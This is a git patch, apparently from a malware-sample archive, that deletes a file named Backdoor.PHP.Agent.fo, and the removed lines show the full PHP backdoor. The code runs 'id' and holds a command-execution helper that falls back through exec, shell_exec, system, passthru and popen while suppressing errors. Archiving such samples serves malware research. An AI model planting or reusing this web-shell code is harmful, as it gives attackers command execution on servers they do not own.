From 62324939eae65f42f6d047a67c1f40c6b1721826 Mon Sep 17 00:00:00 2001
From: vxunderground <57078196+vxunderground@users.noreply.github.com>
Date: Thu, 15 Oct 2020 20:35:52 -0500
Subject: [PATCH] Delete Backdoor.PHP.Agent.fo

---
 PHP/Backdoor.PHP.Agent.fo | 37 -------------------------------------
 1 file changed, 37 deletions(-)
 delete mode 100644 PHP/Backdoor.PHP.Agent.fo

diff --git a/PHP/Backdoor.PHP.Agent.fo b/PHP/Backdoor.PHP.Agent.fo
deleted file mode 100644
index 97e257b..0000000
--- a/PHP/Backdoor.PHP.Agent.fo
+++ /dev/null
@@ -1,37 +0,0 @@
-<?php
-echo "Mic22";
-$cmd="id";
-$eseguicmd=ex($cmd);
-echo $eseguicmd;
-function ex($cfe){
-$res = '';
-if (!empty($cfe)){
-if(function_exists('exec')){
-@exec($cfe,$res);
-$res = join("\n",$res);
-}
-elseif(function_exists('shell_exec')){
-$res = @shell_exec($cfe);
-}
-elseif(function_exists('system')){
-@ob_start();
-@system($cfe);
-$res = @ob_get_contents();
-@ob_end_clean();
-}
-elseif(function_exists('passthru')){
-@ob_start();
-@passthru($cfe);
-$res = @ob_get_contents();
-@ob_end_clean();
-}
-elseif(@is_resource($f = @popen($cfe,"r"))){
-$res = "";
-while(!@feof($f)) { $res .= @fread($f,1024); }
-@pclose($f);
-}}
-return $res;
-}
-exit;
-
-
-- 
GitLab